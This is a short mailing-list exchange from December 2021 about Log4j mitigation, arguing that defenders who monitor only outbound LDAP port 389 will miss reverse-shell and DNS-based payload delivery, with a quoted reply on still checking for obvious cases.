Re: Log4j mitigation

["Jörg Kost" <jk () ip-clear de>]

Yes, but it won't change the outcome. We shall run with assuming breach 
paradigm. In this scenario, it might be useless looking around for port 
389 only; it can give you a wrong assumption.

When a vulnerable system has a reachable path to the Internet and can 
open a reverse shell alone from the URI, waiting for 389 is hopeless. 
389 might be the initial starting port for the first wave of scanner and 
opportunist attackers, but it has already developed further.

Cloudflare already talks about the broad spectrum of possible payloads, 
where you can see that people try to load their payload via DNS (port 
53). Similar, what I posted half hour ago.

https://blog.cloudflare.com/actual-cve-2021-44228-payloads-captured-in-the-wild/


On 13 Dec 2021, at 13:04, Joe Greco wrote:

> On Mon, Dec 13, 2021 at 12:39:58PM +0100, J??rg Kost wrote:
> > You can't see it.
>
> I think you meant "you can't reliably see it".  This doesn't mean
> that it isn't worth looking for obvious cases where you CAN see
> it.
>
> ... JG
> --
> Joe Greco - sol.net Network Services - Milwaukee, WI - 
> http://www.sol.net
> "The strain of anti-intellectualism has been a constant thread winding 
> its way
> through our political and cultural life, nurtured by the false notion 
> that
> democracy means that 'my ignorance is just as good as your 
> knowledge.'"-Asimov